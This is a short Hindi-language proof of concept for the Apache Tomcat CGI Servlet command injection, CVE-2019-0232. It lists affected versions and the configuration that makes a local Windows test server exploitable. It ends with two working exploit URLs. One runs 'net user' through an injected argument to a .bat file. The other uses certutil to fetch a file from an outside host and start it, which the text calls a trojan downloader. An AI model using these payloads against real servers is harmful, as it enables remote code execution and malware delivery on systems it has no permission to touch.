
Apache Tomcat CGI Servlet कमांड इंजेक्शन (CVE-2019-0232) के लिए एक्सप्लॉइट, जो प्रभावित संस्करणों पर विशेष रूप से तैयार किए गए HTTP अनुरोधों के माध्यम से रिमोट कोड निष्पादन सक्षम करता है।
परीक्षण वातावरण Win10 Home 1809 है, JRE संस्करण 18.3 (build 10.0.2+13) है, और Tomcat संस्करण 9.0.13 है।
★Apache Tomcat 9.0.0.M1 to 9.0.17
★Apache Tomcat 8.5.0 to 8.5.39
★Apache Tomcat 7.0.0 to 7.0.93
<servlet>
<servlet-name>cgi</servlet-name>
<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
<init-param>
<param-name>cgiPathPrefix</param-name>
<param-value>WEB-INF/cgi-bin</param-value>
</init-param>
<init-param>
<param-name>enableCmdLineArguments</param-name>
<param-value>true</param-value>
</init-param>
<init-param>
<param-name>executable</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>5</load-on-startup>
</servlet>
Servlet Mappings कॉन्फ़िगर करें:
<servlet-mapping>
<servlet-name>cgi</servlet-name>
<url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>
privileged="true" विशेषता जोड़ें
<Context privileged="true">
<WatchedResource>WEB-INF/web.xml</WatchedResource>
<WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource>
<WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
</Context>
अंत में, webapps/ROOT/WEB-INF फ़ोल्डर के अंतर्गत एक खाली hello.bat फ़ाइल बनाएँ; इसमें कुछ भी लिखने की आवश्यकता नहीं है। Tomcat प्रारंभ करें, ब्राउज़र खोलें, और नीचे दिए गए लिंक पर जाएँ: http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5Cnet+user

एक इंजेक्शन लिंक बनाएँ, जो एक चित्र (ट्रोजन) डाउनलोडर की कार्यक्षमता लागू करता है: http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3a%2f%2fb.hiphotos.baidu.com%2fimage%2fpic%2fitem%2f9825bc315c6034a8ef5250cec5134954082376c9.jpg+1.jpg+%26start+1.jpg
